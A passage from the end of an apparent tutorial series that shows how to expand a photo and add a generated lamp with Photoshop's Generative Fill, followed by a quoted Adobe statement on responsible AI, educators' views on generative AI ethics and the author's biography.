The resulting expansion of the original image as performed by Generative Fill can be very convincing! As mentioned before, this often works best by performing fills in a piece-by-piece patchwork manner:

Image 15: The photograph with a variant applied across the selection

Continue selecting portions of the image using the Rectangular Marquee tool (or any selection tools, really) and generate new content the same way we have done so already – without supplying any text prompt to the AI:

Image 16: The photograph with all expanded areas filled via generative AI

Eventually, you will complete the expansion of the original image and produce a very convincing deception.

Of course, you can also guide the AI with actual text prompts. Let's add in an object to the image as a demonstration.

1. Using the Lasso tool (or again… any selection tool), make a selection across the image in the form of what might hold a standing lamp of some sort:

Image 17: Making an additional selection

2. With a selection established, click Generative Fill within the contextual toolbar.
3. Type in a prompt that describes the object you want to generate. I will use the prompt “tall rustic wooden and metal lamp”.
4. Click the Generate button to process the Generative Fill request:

Image 18: A lamp is generated from our selection and text prompt

A set of generated lamp variants is established within the Properties panel. Choose the one you like the most and it will be applied within the image.

You will want to be careful with how many Generative Layers are produced as you work on any single document. Keep an eye on the Layers panel as you work:

Image 19: Each Generative Fill process produces a new layer

Each time you use Generative Fill within Photoshop, a new Generative Layer is produced. Depending upon the resources and capabilities of your computer… this might become burdensome as everything becomes more and more complex. You can always flatten your layers to a single pixel layer if this occurs to free up additional resources.

That concludes our overview of Generative Fill in the Photoshop public beta!

Ethical Concerns with Generative AI

I want to make one additional note before concluding this series, and that has to do with the ethics of generative AI. This concern goes beyond Adobe Firefly specifically – as it could be argued that Firefly is the least problematic and most ethical implementation of generative AI that is available today.

See https://firefly.adobe.com/faq for additional details on steps Adobe has taken to ensure responsible AI through their use of Adobe Stock content to train their models, through the use of Content Credentials, and more:

"Like all our AI capabilities, Firefly is developed and deployed around our AI ethics principles of accountability, responsibility, and transparency.

Data collection: We train our model by collecting diverse image datasets, which have been curated and preprocessed to mitigate against harmful or biased content. We also recognize and respect artists' ownership and intellectual property rights. This helps us build datasets that are diverse, ethical, and respectful toward our customers and our community.

Addressing bias and testing for safety and harm: It's important to us to create a model that respects our customers and aligns with our company values. In addition to training on inclusive datasets, we continually test our model to mitigate against perpetuating harmful stereotypes. We use a range of techniques, including ongoing automated testing and human evaluation.

Regular updates and improvements: This is an ongoing process. We will regularly update Firefly to improve its performance and mitigate harmful bias in its output. We also provide feedback mechanisms for our users to report potentially biased outputs or provide suggestions into our testing and development processes. We are committed to working together with our customers to continue to make our model better."

-- Adobe

I have had discussions with a number of fellow educators about the ethical use of generative AI and Firefly in general.
Here are some paraphrased takeaways to consider as we conclude this article series:

• “We must train the new generations in the respect and proper use of images or all kinds of creative work.”
• “I don't think AI can capture that sensitive world that we carry as human beings.”
• “As dire as some aspects of all of this are, I see opportunities.”
• “Thousands of working artists had their life's work unknowingly used to create these images.”
• “Professionals will be challenged, truly, by all of this, but somewhere in that process I believe we will find our space.”
• “AI data expropriations are a form of digital colonialism.”
• “For many students, the notion of developing genuine skill seems pointless now.”
• “Even for masters of the craft, it's dispiriting to see someone type 10 words and get something akin to what took them 10 years.”

I've been using generative AI for a few years now and can appreciate and understand the concerns expressed above - but I also recognize that this technology is not going away. We must do what we can to address the ethical concerns brought up here and make sure to use our awareness of these problematic issues to further guide the direction of these technologies as we rapidly advance forward. These are very challenging times, right now.

Author Bio

Joseph Labrecque is a Teaching Assistant Professor, Instructor of Technology, University of Colorado Boulder / Adobe Education Leader / Partner by Design.

Joseph Labrecque is a creative developer, designer, and educator with nearly two decades of experience creating expressive web, desktop, and mobile solutions. He joined the University of Colorado Boulder College of Media, Communication, and Information as faculty with the Department of Advertising, Public Relations, and Media Design in Autumn 2019. His teaching focuses on creative software, digital workflows, user interaction, and design principles and concepts. Before joining the faculty at CU Boulder, he was associated with the University of Denver as adjunct faculty and as a senior interactive software engineer, user interface developer, and digital media designer.

Labrecque has authored a number of books and video course publications on design and development technologies, tools, and concepts through publishers which include LinkedIn Learning (Lynda.com), Peachpit Press, and Adobe. He has spoken at large design and technology conferences such as Adobe MAX and for a variety of smaller creative communities. He is also the founder of Fractured Vision Media, LLC, a digital media production studio and distribution vehicle for a variety of creative works.

Joseph is an Adobe Education Leader and a member of Adobe Partners by Design. He holds a bachelor's degree in communication from Worcester State University and a master's degree in digital media studies from the University of Denver.

Author of the book: Mastering Adobe Animate 2023